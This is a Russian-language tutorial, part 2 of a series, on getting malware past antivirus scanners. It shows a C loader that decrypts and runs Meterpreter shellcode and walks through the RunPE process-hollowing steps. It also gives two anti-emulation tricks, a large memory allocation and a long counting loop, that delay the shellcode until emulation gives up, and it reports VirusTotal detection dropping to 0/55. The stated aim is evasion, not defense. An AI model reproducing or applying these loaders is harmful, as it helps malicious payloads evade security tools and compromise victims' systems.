Обход антивирусов. Антиэмуляция, обход сигнатур. [Практика] Часть 2

Привет! В этой статье мы продолжим обсуждать насущные проблемы обхода антивирусов.

ВНИМАНИЕ: Автор не призывает к нарушению УК РФ, а предоставляет информацию для общего развития. Автор не несёт ответственности за ваши действия.

Мне нужен код, который будет считаться вредоносным. Легчайший путь сделать это, это использовать хорошо известную Meterpreter нагрузку из Metasploit Framework. Я написал код на C, который вызывает не зашифрованный meterpreter шеллкод, который описан здесь. Я зашифровал код таким образом, что любой антивирусный статический анализ не удастся (включая анализ загрузчика-расшифровщика).

Здесь представлена копия главной функции:

int main( void )
{
decryptCodeSection(); //Дешифрование кода
startShellCode(); // Вызвать дешифрованный шеллкод метерпретера.
return 0;
}

Код

int main( void )

{

   decryptCodeSection(); //Дешифрование кода

   startShellCode(); // Вызвать дешифрованный шеллкод метерпретера.

   return 0;

}

Эта версия кода обнаруживается локальными антивирусами и имеет VirusTotal счёт:

12/55

Это показывает, что в настоящее время, антивирусы все больше и больше зависят от динамического анализа, но для большинства из них это еще не так.

Из этого результата, моя цель заключается в том, чтобы найти методы, обхода антивируса и снизить оценку обнаружение до нуля.

Сложные методы

Существуют сложные способы обхода антивирусов, эти методы хорошо документированы. Важно знать их, но это не тема этой статьи. Эти сложные методы обычно используются в современной малвари не только для того, чтобы избежать обнаружения антивирусами.

1. Метод инъекции кода

Инъекция кода состоит во внедрении кода в другой процесс. В основном это делается с помощью DLL инъекции, но существуют и другие методы. Сложность этого метода заключается в том, что при инъекции кода мы должны найти способ выполнить нужный нам код, не загружаясь системой нормально (особенно, потому что базовый адрес постоянно меняется). DLL инъекция, работает только если подгружается DLL. При использовании инъекции кода, важно помнить, что код должен быть в состоянии модифицировать указатели памяти основанные на перемещении секций.

DLL инъекция и инъекция кода уже были описаны в интернете. Эти методы трудно воплощаются в жизни, поэтому их описание выходит за рамки этой статьи. Просто имейте в виду, что инъекция кода это хороший способ оставаться скрытым, но этот метод содержит много кода, который может быть опознан эвристическом анализатором как вредоносный.

2. Метод RunPE

Термин "RunPE" относится к способу, который состоит из запуска некоторого кода в другом процессе, заменяя код процесса, на код который вы хотите выполнить. Различие между инъекцией кода, это то, что при инъекции кода вы выполняете код в отдалённом процессе; в RunPE методе вы заменяете код удалённого процесса на тот, который вы хотите выполнить.
Вот краткий пример того, как он может работать, чтобы скрыть вредоносное ПО.

Представьте, что вредоносная программа упакована/зашифрована и вставлена в другой двоичный файл, предназначенный для загрузки (используя, например, связанные ресурсы). Когда загрузчик будет запущен, он:

• Создаст действующий системный процесс, используя, например, CreateProcess.

• Прекратит проецировать память процесса, используя NtUnmapViewOfSection.

• Заменить память, кодом малвари (используя WriteProcessMemory).

• После возобновления процесса (используя ResumeThread) вредоносный код выполнится вместо процесса.

Заметка: Замещение памяти процесса невозможно, если процесс защищён с помощью DEP (Data Execution Prevention).
В этом случае, вместо того, чтобы использовать метод RunPE, загрузчик может просто вызвать другой экземпляр самого себя и внедрить в него вредоносный код.

Поскольку модифицированный код написан самим злоумышленником, метод всегда будет работать (при условии, что загрузчик скомпилирован без DEP).

Простые, но эффективные методы

Теперь, когда мы обсудили некоторые сложные методы, давайте рассмотрим простые методы антиэмуляции.

Основное ограничение антивирусных сканеров - это время, в течение которого они могут потратить слишком много сил на что-либо. Простейший метод обхода антивируса состоит в том, чтобы забрать у него побольше времени, прежде чем вредоносный код будет расшифрован. Использование простой задержки Sleep, не приведёт к обходу антивируса, так как антивирусный эмулятор адаптирован к этому. Этот тип обхода называется «Предложение, от которого вы должны отказаться», потому что этот тип обхода налагает на антивирусы некоторый код, на который антивирусу потребуется много ресурсов, поэтому я уверен, что антивирус отстанет от нас до запуска зловредного кода.

Пример 1: Выделение и заполнение 100 миллионов байтов памяти.
В этом примере, мы просто выделяем и заполняем 100 мегабайт памяти. Этого достаточно, для того, чтобы обескураживания любую антивирусную эмуляцию.

#define TOO_MUCH_MEM 100000000
int main( void )
{
char * memdmp = NULL;
memdmp = (char *) malloc(TOO_MUCH_MEM);

if( memdmp != NULL )
{
memset(memdmp, 00, TOO_MUCH_MEM);
free(memdmp);
decryptCodeSection();
startShellCode();
}
return 0;
}

Код

#define TOO_MUCH_MEM 100000000

int main( void )

{

  char * memdmp = NULL;

  memdmp = (char *) malloc(TOO_MUCH_MEM);



  if( memdmp != NULL )

  {

   memset(memdmp, 00, TOO_MUCH_MEM);

   free(memdmp);

   decryptCodeSection();

   startShellCode();

  }

  return 0;

}

VirusTotal счёт:
0/55

Видите как легко избежать обнаружение антивирусом? Этот метод основан на классической и очень частой функции malloc. Ещё плюс в том, что нет никаких строк, на который можно было бы построить сигнатуру. Единственный недостаток, это то, что 100 мегабайт памяти сгорают, а это может быть обнаружено хорошей системой мониторинга.
Заметка: если вы не запустите часть с memset, то оценка будет 4/55.

Пример 2: 100 миллионная инкременция
Этот метод ещё легче. В данном случаем, мы используем for цикл, чтобы инкрементировать переменную счётчик 100 миллионнов раз. Этого достаточно, чтобы обойти антивирус, но это ничто для современного процессора. Человек не заметит никакой разницы между этим кодом и кодом без обхода.

#define MAX_OP 100000000

int main( void )
{
int cpt = 0;
for(int i = 0; i < MAX_OP; i++)
{
cpt++;
}
if( cpt == MAX_OP )
{
decryptCodeSection();
startShellCode();
}
return 0;
}

Код

#define MAX_OP 100000000



int main( void )

{

  int cpt = 0;

  for(int i = 0; i < MAX_OP; i++)

  {

   cpt++;

  }

  if( cpt == MAX_OP )

  {

   decryptCodeSection();

   startShellCode();

  }

  return 0;

}

VirusTotal счёт:
0/55
Метод «Предложение, от которого вы должны отказаться» очень мощен. Ну, на этом всё. Спасибо за внимание.
Часть 1